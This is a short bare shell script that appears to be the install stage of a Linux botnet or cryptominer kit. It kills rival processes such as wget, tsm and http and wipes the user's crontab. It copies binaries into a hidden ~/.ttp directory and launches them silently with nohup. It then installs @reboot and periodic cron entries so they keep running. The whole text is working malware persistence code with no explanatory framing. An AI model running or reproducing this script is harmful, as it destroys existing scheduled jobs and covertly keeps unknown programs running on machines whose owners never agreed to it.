pkill -9 start
pkill -9 http
pkill -9 go
pkill -9 tsm
pkill -9 sleep
pkill -9 wget
pkill -9 run
pkill -9 ps
pwd > dir.dir
dir=$(cat dir.dir)
crontab -r
cd $dir
rm -rf cron.d
rm -rf ~/.ttp
mkdir ~/.ttp
cp -r a ~/.ttp/
cp -r b ~/.ttp/
cd ~/.ttp/a/
nohup ./a >>/dev/null &
cd ~/.ttp/b/
nohup ./a >>/dev/null &

cd $dir
cd c
nohup ./start >>/dev/null &
cd ~/.ttp/
pwd > dir2.dir
dir2=$(cat dir2.dir)

echo "* */12 * * * $dir2/a/upd>/dev/null 2>&1
@reboot $dir2/a/upd>/dev/null 2>&1
5 8 * * 0 $dir2/b/sync>/dev/null 2>&1
@reboot $dir2/b/sync>/dev/null 2>&1  
#5 1 * * * $dir/c/aptitude>/dev/null 2>&1" >> cron.d

crontab cron.d
crontab -l

